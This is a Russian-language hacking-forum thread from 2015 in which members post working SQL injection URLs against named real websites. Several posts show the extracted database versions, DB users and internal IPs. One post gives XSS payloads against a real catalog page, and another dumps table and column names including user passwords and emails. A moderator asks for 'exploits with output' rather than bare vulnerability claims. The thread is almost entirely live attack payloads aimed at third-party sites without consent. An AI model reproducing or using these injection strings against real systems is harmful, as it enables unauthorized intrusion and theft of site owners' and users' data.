HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 13.05.2015, 21:23
tiger_x
Guest
Сообщений: n/a
Провел на форуме:
7357

Репутация: 7
По умолчанию

Код HTML:
HTML:
http://www.sporte-leisure.com.au/info.php?id=-1%27%20union%20all%20select%20null,concat%280x74696765725F783C62723E3C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,null,null,null,null--%27
Version:: 5.1.48-community

User:: root@localhost
 
Ответить с цитированием

  #32  
Старый 14.05.2015, 01:44
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

перед постом проверяйте, не выкладывалась ли уже найденная вами уязвимость. сделать это можно так:

Google: site:antichat.ru вашсайтсуязвимостью.ру
 
Ответить с цитированием

  #33  
Старый 14.05.2015, 18:49
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Господа, требуется написать некий пример, эксплоит с выводом.. а не поле = VULNERABLE и ковычка у параметра.
 
Ответить с цитированием

  #34  
Старый 14.05.2015, 19:11
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию

Цитата:
Сообщение от Filipp  
Filipp said:

1) SQL-inj
http://amphora.ru/books.php?pageit=
VULNERABLE
Код:
Code:
http://amphora.ru/books.php?pageit=10+procedure+analyse+(extractvalue(1,concat(0x3a,version())),1)--
XPATH syntax error: ':5.5.35-1+wheezy1+mh1-log'
 
Ответить с цитированием

  #35  
Старый 14.05.2015, 19:25
tiger_x
Guest
Сообщений: n/a
Провел на форуме:
7357

Репутация: 7
По умолчанию

Код HTML:
HTML:
http://www.pidsphil.org/journal.php?id=40%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT%280x74696765725F783C62723E3C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Version:: 5.5.32-log

User:: pidsphil_user1@10.20.112.231
 
Ответить с цитированием

  #36  
Старый 14.05.2015, 21:52
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Не очень я люблю xss

Код HTML:
HTML:
http://tab.dp.ua/catalog.php?sword=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%32%33%29%3b%3c%2f%73%63%72%69%70%74%3e
Ну так же ради юмора

Код HTML:
HTML:
http://tab.dp.ua/catalog.php?sword=%3c%68%31%3e%48%45%4c%4c%4f%3c%2f%68%31%3e
нашёл случайно в попытках вставить php код.

Там ещё sql есть
 
Ответить с цитированием

  #37  
Старый 15.05.2015, 00:19
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

Цитата:
Сообщение от None  
[HTML]
HTML:
...
...
,,subscribers,is_active,,temp_keys,session_id,,tem p_keys,code,,temp_keys,date,,users,id,,users,user_ pass,,users,email,,users,name,,users,company,,user s,activity,,users,position,,users,phone,,users,reg time,,users,last_visit_time,,users,last_ip,,users, code,,users,is_blocked,,users,is_active,,users,sub scribe,,users_sessions,session_id,,users_sessions, unid,,users_sessions,created_time,,year,id">
 
Ответить с цитированием

  #38  
Старый 15.05.2015, 11:20
tiger_x
Guest
Сообщений: n/a
Провел на форуме:
7357

Репутация: 7
По умолчанию

Код HTML:
HTML:
http://www.muziekhuis.nl/details.php?id=-1%20union%20all%20select%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat%280x3C62723E54494745525F583C62723E,0x56657273696F6E3A3A20,version%28%29,0x3C62723E557365723A3A20,user%28%29%29,NULL,NULL,NULL,NULL,NULL
Version:: 5.5.43-0+deb7u1

User:: muzhuis_qbusa@194.109.22.94
 
Ответить с цитированием

  #39  
Старый 16.05.2015, 01:46
Mister_Bert0ni
Guest
Сообщений: n/a
Провел на форуме:
35015

Репутация: 57
По умолчанию

 
Ответить с цитированием

  #40  
Старый 16.05.2015, 12:36
Шниперсон
Guest
Сообщений: n/a
Провел на форуме:
20946

Репутация: 3
По умолчанию

Мои 5 копеек

http://www.podarochek .by/about?curCategory=10&curItem=-666+union+select+1,3,user%28%29,5,6,7,8,9,10
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ